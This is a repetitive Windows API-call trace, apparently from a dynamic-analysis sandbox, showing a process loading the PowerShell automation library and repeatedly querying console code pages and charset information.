	[0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43adec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.192] GetLastError () returned 0xcb
	[0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ade70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.192] GetLastError () returned 0xcb
	[0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ade70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.192] GetLastError () returned 0xcb
	[0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ade70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.192] GetLastError () returned 0xcb
	[0090.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43adec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.220] GetLastError () returned 0xcb
	[0090.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ade70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.220] GetLastError () returned 0xcb
	[0090.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43ade70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.220] GetLastError () returned 0xcb
	[0090.246] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0090.246] GetLastError () returned 0xcb
	[0090.246] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x43ae3d0 | out: lpConsoleScreenBufferInfo=0x43ae3d0) returned 1
	[0090.246] GetLastError () returned 0xcb
	[0090.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.252] GetLastError () returned 0xcb
	[0090.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43aded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.255] GetLastError () returned 0xcb
	[0090.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43aded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.255] GetLastError () returned 0xcb
	[0090.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x43aded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.255] GetLastError () returned 0xcb
	[0090.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.301] GetLastError () returned 0xcb
	[0090.336] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0090.336] GetLastError () returned 0xcb
	[0090.336] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x43aeae4 | out: lpConsoleScreenBufferInfo=0x43aeae4) returned 1
	[0090.336] GetLastError () returned 0xcb
	[0090.338] GetConsoleOutputCP () returned 0x1b5
	[0090.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.338] GetLastError () returned 0xcb
	[0090.338] GetConsoleOutputCP () returned 0x1b5
	[0090.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.339] GetLastError () returned 0xcb
	[0090.339] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.340] GetLastError () returned 0xcb
	[0090.340] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.341] GetLastError () returned 0xcb
	[0090.341] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.342] GetLastError () returned 0xcb
	[0090.342] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.343] GetLastError () returned 0xcb
	[0090.343] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.344] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.344] GetLastError () returned 0xcb
	[0090.344] GetConsoleOutputCP () returned 0x1b5
	[0090.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.345] GetLastError () returned 0xcb
	[0090.345] GetConsoleOutputCP () returned 0x1b5
	[0090.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.345] GetLastError () returned 0xcb
	[0090.345] GetConsoleOutputCP () returned 0x1b5
	[0090.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.345] GetLastError () returned 0xcb
	[0090.345] GetConsoleOutputCP () returned 0x1b5
	[0090.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.345] GetLastError () returned 0xcb
	[0090.345] GetConsoleOutputCP () returned 0x1b5
	[0090.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.345] GetLastError () returned 0xcb
	[0090.345] GetConsoleOutputCP () returned 0x1b5
	[0090.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.345] GetLastError () returned 0xcb
	[0090.345] GetConsoleOutputCP () returned 0x1b5
	[0090.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.345] GetLastError () returned 0xcb
	[0090.345] GetConsoleOutputCP () returned 0x1b5
	[0090.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.346] GetLastError () returned 0xcb
	[0090.346] GetConsoleOutputCP () returned 0x1b5
	[0090.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.346] GetLastError () returned 0xcb
	[0090.346] GetConsoleOutputCP () returned 0x1b5
	[0090.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.346] GetLastError () returned 0xcb
	[0090.346] GetConsoleOutputCP () returned 0x1b5
	[0090.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.346] GetLastError () returned 0xcb
	[0090.346] GetConsoleOutputCP () returned 0x1b5
	[0090.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.346] GetLastError () returned 0xcb
	[0090.346] GetConsoleOutputCP () returned 0x1b5
	[0090.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.346] GetLastError () returned 0xcb
	[0090.346] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.347] GetLastError () returned 0xcb
	[0090.347] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.348] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.348] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.348] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.348] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.348] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.348] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.348] GetConsoleOutputCP () returned 0x1b5
	[0090.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.348] GetLastError () returned 0xcb
	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.349] GetLastError () returned 0xcb
	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.349] GetLastError () returned 0xcb
	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.349] GetLastError () returned 0xcb
	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.349] GetLastError () returned 0xcb
